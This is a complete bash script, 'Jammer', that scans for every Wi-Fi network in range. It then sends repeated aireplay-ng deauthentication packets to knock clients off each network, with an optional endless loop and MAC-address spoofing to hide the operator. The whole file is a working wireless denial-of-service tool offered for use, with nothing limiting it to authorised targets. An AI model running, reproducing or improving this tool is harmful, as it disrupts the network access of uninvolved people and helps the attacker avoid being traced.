#!/bin/bash

# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE

# Current Version
version="v0.5"

# Variable and static names for Wireless interface
wint="wlan0"
wint_static="wlan0"

# Variable and static names for Ethernet interface
eint="eth0"
eint_static="eth0"


# base name for scan files
name=jam_scan

# regex for is-number check
re='^[0-9]+$'

# default DeAuth times for each MAC address
deauth_number=10

# try to change macs with macchanger
change_macs=0

# yes to all variable
yes_to_all=0

# if 1, do not delete the files at the end
keep_scan_files=0

# decide if the program is an endless loop
endless=0

# an array of files to white-list
white_list=

# some colors
RED='\e[0;31m'
GREEN='\e[0;32m'
BROWN='\e[0;33m'
BOLD='\e[1m'
NC='\e[0m'

# prompt
prompt="${BOLD}jam!${NC} "

# check for the right permissions
check_perm() {
    if (( EUID != 0 )); then
      echo -e "${prompt}${RED}Re-run the script, this time with root privileges.${NC}"
      exit 0
    fi
}

# check if any of the required commands is missing
check_dep() {
    for command in airmon-ng macchanger iwlist awk
    do
      if [[ -z $(which $command) ]]; then
         echo "$command was not found"
         echo "Consider installing it from the repositories of your distribution"
         exit 0
      fi
    done
    echo -e "${prompt}${GREEN}All dependencies are met, moving on.${NC}"
}

# check if argument is number
check_number() {
    if [[ ! ($1 =~ $re) ]]; then
        echo -e "${prompt}${RED}Wrong argument format. Exiting.${NC}"
        exit 0
    fi
    return 1
}

# check if array contains element
array_contains_element() {
    local array="$1[@]"
    local seeking=$2
    local in=1
    for element in "${!array}"; do
        if [[ $element == $seeking ]]; then
            in=0
            break
        fi
    done
    return $in
}

# change the MACs of the machine
change_macs() {
    # Change mac address for Ethernet interface
    printf "${prompt}Changing MAC for Ethernet Interface\n"
    macchanger -A $eint
    # Change mac address and initiate monitor mode
    printf "${prompt}Changing MAC for Wireless Interface\n"
    ifconfig $wint down
    sleep 1
    macchanger -A $wint
    # Set wlan to monitor mode
    sleep 1
    iwconfig $wint mode Monitor
    sleep 1
    ifconfig $wint up
}

# reset the MACs and settings and remove files created
cleanup_and_reset() {
    if [[ $change_macs -eq 1 ]]; then
        printf "${prompt}Reseting the default MAC for Ethernet Interface\n"
        macchanger -p $eint
        printf "${prompt}Reseting the default MAC for Wireless Interface\n"
        ifconfig $wint down
        sleep 1
        macchanger -p $wint
        sleep 1
        iwconfig $wint mode Managed
        sleep 1
        ifconfig $wint up
    fi
    if [[ keep_scan_files -eq 0 ]]; then
        printf "${prompt}Cleaning up the created files . . .\n"
        rm -f ${name}_out.txt
        rm -f $name-01.csv
        rm -f $name-01.cap
        rm -f $name-01.kismet.csv
        rm -f $name-01.kismet.netxml
    fi
    printf "${prompt}Done. Exiting.\n"
}

# a warning before the attack starts
warn_before() {
    printf "${prompt}${GREEN}DONE FINDING TARGETS${NC}\n"
    printf "${prompt}${RED}THE ATTACK WILL START IN 5 SECONDS${NC}\n"
    printf "${prompt}${GREEN}IF YOU WANT TO ABORT DO IT NOW${NC}\n"
    sleep 5
}

# a warning about the interfaces
warn_about_interface() {
    printf "${prompt}${BROWN}One or more of the interfaces have not been changed\n${NC}"
    printf "${prompt}${BROWN}The detected interfaces are: \n${NC}"
    ls /sys/class/net/ | awk '{print "     ",$1}'
    printf "${prompt}${BROWN}The defaults are${NC} $wint${BROWN} and ${NC}$eint\n"
    printf "${prompt}${BROWN}If they do not match, cancel the scan and use -e and -w to set them\n${NC}"
    if [[ yes_to_all -eq 0 ]]; then
        printf "${prompt}${BROWN}Waiting 8 seconds to make up your mind${NC}\n"
        sleep 8
    fi
    printf "${prompt}${BROWN}Continuing ...${NC}\n"
}

# prints the help message
show_help() {
    echo
    echo "Usage: jammer [OPTION] ... "
    echo "Jam Wifi Networks That Your Wireless Card Can Reach."
    echo
    printf "${GREEN} -d, --deauths${NC}"
    printf ": Set the number of deauthentications for each station. Default is 10\n"
    printf "${GREEN} -y, --yes${NC}"
    printf ": Make 'Yes' the answer for everything the script asks\n"
    printf "${GREEN} -s, --endless${NC}"
    printf ": When reaching the end of the list, start again\n"
    printf "${GREEN} -f, --whitelist${NC}"
    printf ": A file with ESSID's to ignore during the attack\n"
    printf "${GREEN} -k, --keep${NC}"
    printf ": Keep the scan files after the script ends\n"
    printf "${GREEN} -n, --name${NC}"
    printf ": Choose the names the scan files are saved as\n"
    printf "${GREEN} -e, --ethernet${NC}"
    printf ": Set the name for the ethernet interface. Default is 'eth0'\n"
    printf "${GREEN} -w, --wireless${NC}"
    printf ": Set the name for the wireless interface. Default is 'wlan0'\n"
    printf "${GREEN} --spoof-mac${NC}"
    printf ": Try to change MACs using macchanger\n"
    printf "${GREEN} -h, --help${NC}"
    printf ": Show this help message\n"
    echo
    echo
}


scan_area() {
    if iwlist $wint scanning |
        while IFS= read -r line; do
            [[ "$line" =~ Address ]] && bssid=${line##*ss: }
            [[ "$line" =~ \(Channel ]] && { channel=${line##*nel }; channel=${channel:0:$((${#channel}-1))}; }
            [[ "$line" =~ ESSID ]] && {
                essid=${line##*ID:}
                #array_contains_element $white_list $essid == 0 && echo "${bssid};${channel};${essid}"
                found=0
                for element in "${white_list[@]}"; do
                    element=$( echo "${element}" | sed -e 's/^ *//' -e 's/ *$//' );
                    if [[ $element == $essid ]]; then
                        found=1
                        break
                    fi
                done
                if [[ $found -eq 0 ]]; then
                    echo "${bssid};${channel};${essid}"
                fi
            }
        done > ${name}_out.txt ;
    then
        echo "Something went wrong, retrying"
        sleep 5
        scan_area
    fi
}

deauth() {
    local essid="$1"
    local bssid="$2"
    local channel="$3"
    if [[ "$channel" =~ $re ]]; then
        echo -e ${prompt}Targeting:${RED} "$essid" ${NC} with BSSID: "$bssid" @ ${GREEN}Channel "$channel" ${NC}
        sleep 3
        iwconfig $wint channel "$channel"
        aireplay-ng -0 $deauth_number -a "$bssid" $wint
    fi
}

read_file_and_deauth() {
    warn_before
    # Read the file, line by line and de-auth each MAC
    while read -r line
    do
        read bssid channel essid <<< $(echo $line | awk -F";" '{print $1 " " $2 " " $3}')
        deauth "$essid" "$bssid" "$channel"
    done < ${name}_out.txt
}

# starts attack, if endless is 1, goes on forever
main_attack() {
    read_file_and_deauth
    if [[ endless -eq 1 ]]; then
        main_attack
    else exit 0
    fi
}


# a fucntion to print the detected stations from the file
show_detected_stations() {
    printf "${prompt}Detected Stations are:\n"
    awk -F";" '{print NR,$3}' ${name}_out.txt
    printf "\n\n"
}


echo
echo "Jammer $version"
echo


# parse the options if there are any
while [[ $# > 0 ]]
do
key="$1"
case $key in
    -d|--deauths)
        deauth_number="$2"
        check_number $deauth_number
        echo -e "${prompt}${GREEN}Setting deauth number to $deauth_number ${NC}"
        shift
    ;;
    --spoof-mac)
        change_macs=1
        echo -e "${prompt}${GREEN}I will try to change your macs${NC}"
    ;;
    -y|--yes)
        yes_to_all=1
        echo -e "${prompt}${GREEN}Setting YES as the answer to all${NC}"
    ;;
    -s|--endless)
        endless=1
        echo -e "${prompt}${GREEN}Setting mode to Endless${NC}"
    ;;
    -f|--whitelist)
        readarray white_list < "$2"
        echo -e "${prompt}${GREEN}Trying to whitelist the ESSID's in the file $2 ${NC}"
        shift
    ;;
    -k|--keep)
        keep_scan_files=1
        echo -e "${prompt}${GREEN}Scan files will be kept${NC}"
    ;;
    -n|--name)
        name="$2"
        echo -e "${prompt}${GREEN}Setting scan file names to $name ${NC}"
        shift
    ;;
    -e|--ethernet)
        eint="$2"
        echo -e "${prompt}${GREEN}Setting ethernet interface name to $eint ${NC}"
        shift
    ;;
    -w|--wireless)
        wint="$2"
        echo -e "${prompt}${GREEN}Setting wireless interface name to $wint ${NC}"
        shift
    ;;
    -h|--help)
        show_help
        exit 0
    ;;
    *)
        echo -e "${prompt}${RED}Unknown option, exiting.${NC}"
        exit 0
    ;;
esac
# go to the next argument
shift
done


# check permissions
check_perm

# check dependencies
check_dep

# if the default interfaces have not changed, warn the user
if [[ "$eint" == "$eint_static" ]] || [[ "$wint" == "$wint_static" ]]; then
    warn_about_interface
fi

# trap to clean the files and reset at the end
trap cleanup_and_reset EXIT

# change directory to the place the script is executed from
cd "$(dirname "$0")"

# show the station names you want to filter out
if [ ${#white_list[@]} -ne 0 ]; then
    echo -e "${prompt}Whitelisted stations: ${NC}"
    echo "${white_list[@]}" | sed -e 's/^ *//' -e 's/ *$//'
fi


# execute scan and save the discovered MAC addresses and channels to a file
printf "${prompt}${GREEN}Scanning the area for active stations${NC}\n"
scan_area

if [[ $change_macs -eq 1 ]]; then
  change_macs
fi

show_detected_stations

# check if the user wants no interaction
if [[ $yes_to_all -eq 1 ]]; then
    main_attack
    exit 0
fi

# else ask the user
printf "${prompt}Scan is completed. Start jamming? [Y/n] "
read answer_start
case $answer_start in
        [Nn] | [Nn][Oo] )
            printf "${prompt}${RED}Aborted.\n${NC}"
            exit 0
        ;;
        *)
            main_attack
            exit 0
        ;;
esac
